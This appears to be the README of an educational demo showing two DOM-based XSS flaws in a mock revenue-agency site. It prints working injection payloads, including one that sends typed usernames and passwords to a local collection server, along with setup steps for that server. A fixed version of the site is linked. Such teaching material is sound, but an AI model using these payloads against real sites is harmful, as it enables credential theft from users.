This is a demo of two DOM-based XSS vulnerabilities in a specifically crafted for this purpose website. Imagine you're in No Man's Land and you need to access their revenue agency in order to fill in some tax statements...
To get started, navigate to No Man's Land Revenue Agency home page: https://mtsanovv.github.io/nomanslandra/frontend/index.html. Feel free to play around with the website and figure out the XSS vulnerabilities yourself (or you can just check out the section below).
-
To inject malicious code via html element, open the search page and put the following string in the query input field and then press 'Search':
article');$("#search").append("<img src=\"https://media.tenor.com/7XnVtgeQv4EAAAAC/money-pool-rich.gif\"/><iframe width=\"1\" height=\"1\" src=\"https://www.youtube.com/embed/_w7Ft_JTbH4?autoplay=1&loop=1\"><\/iframe>");console.log(' -
To inject malicious code via URL and collect some credentials:
- Create a MySQL database using the
storeCredentials.sqlfile from thebackenddirectory and grantSELECT/INSERT/UPDATE/DELETEprivileges for it to some user - Navigate to the
backenddirectory and configure the MySQL properties inserver.js(make sure to use the user from step 1) - Run
node server.js(you may need to run firstnpm install express mysql corsin thebackenddirectory) - Navigate to the malicious login page URL
- Create a MySQL database using the
- Created for educational purposes only and to demonstrate how bad XSS vulnerabilities can be
- Recommended browser engine: Chromium (Chrome). Gecko (Firefox) might also work but it has not been tested and WebKit (Safari) is not recommended due to odd behavior
- The app that has those XSS vulnerabilities fixed can be found at the following URL: https://mtsanovv.github.io/nomanslandra/frontendInvulnerable/index.html
- This is the unencoded JavaScript code for the 'continue' parameter in the malicious URL:
$.ajax({contentType:'application/json',type:'POST',url:'http://localhost:3000/storeCredentials',data:JSON.stringify({username:$('input:eq(0)').val(),password:$("input:eq(1)").val()})});$("article").first().append('<img src="https://media.tenor.com/7XnVtgeQv4EAAAAC/money-pool-rich.gif"/><iframe width="1" height="1" src="https://www.youtube.com/embed/_w7Ft_JTbH4?autoplay=1"></iframe>');console.log - The website is based on Telephasic by HTML5UP!
- Inspired by: https://btvnovinite.bg/bulgaria/shegadzhii-udariha-sajta-na-nap.html
Creative Commons Attribution 3.0 Unported http://creativecommons.org/licenses/by/3.0/
M.Tsanov, 2023
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent
%27).val(),password:$(%22input:eq(1)%22).val()%7D)%7D);$(%22article%22).first().append(%27%3Cimg%20src=%22https://media.tenor.com/7XnVtgeQv4EAAAAC/money-pool-rich.gif%22/%3E%3Ciframe%20width=%221%22%20height=%221%22%20src=%22https://www.youtube.com/embed/_w7Ft_JTbH4?autoplay=1%22%3E%3C/iframe%3E%27);console.log){kind=link}